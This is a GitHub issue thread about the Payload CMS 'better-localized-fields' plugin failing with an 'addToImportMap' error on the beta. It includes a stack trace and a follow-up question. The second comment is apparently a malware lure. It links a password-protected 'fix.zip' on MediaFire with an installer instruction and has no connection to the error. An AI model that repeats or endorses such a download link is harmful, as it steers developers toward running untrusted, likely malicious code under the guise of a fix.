### ISSUE TITLE
better-localized-fields: Payload component must be an object or a string

### ISSUE THREAD

**Issue by Dan6erbond** [r1tsuu/payload-enchants#93]
Hey there! I really like the idea of the `better-localized-fields` plugin for a more intuitive editing experience, however I can't seem to get it working with the latest beta. The following error is shown in the console if I try to use it:

```node
Generating import map
[Function: Field]
 ⨯ node_modules\payload\dist\bin\generateImportMap\index.js (53:1) @ addToImportMap
 ⨯ Internal error: Error: addToImportMap > Payload component must be an object or a string
    at addToImportMap (./node_modules/payload/dist/bin/generateImportMap/index.js:64:19)
    at genImportMapIterateFields (./node_modules/payload/dist/bin/generateImportMap/iterateFields.js:51:54)
    at iterateCollections (./node_modules/payload/dist/bin/generateImportMap/iterateCollections.js:9:85)
    at iterateConfig (./node_modules/payload/dist/bin/generateImportMap/iterateConfig.js:10:79)
    at generateImportMap (./node_modules/payload/dist/bin/generateImportMap/index.js:84:69)
    at reload (./node_modules/@payloadcms/next/dist/utilities/getPayloadHMR.js:47:69)
    at async getPayloadHMR (./node_modules/@payloadcms/next/dist/utilities/getPayloadHMR.js:70:7)
    at async RootLayout (./node_modules/@payloadcms/next/dist/layouts/Root/index.js:57:21)```

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by notflip** [comment]
@Dan6erbond Did you ever find a solution to this issue?
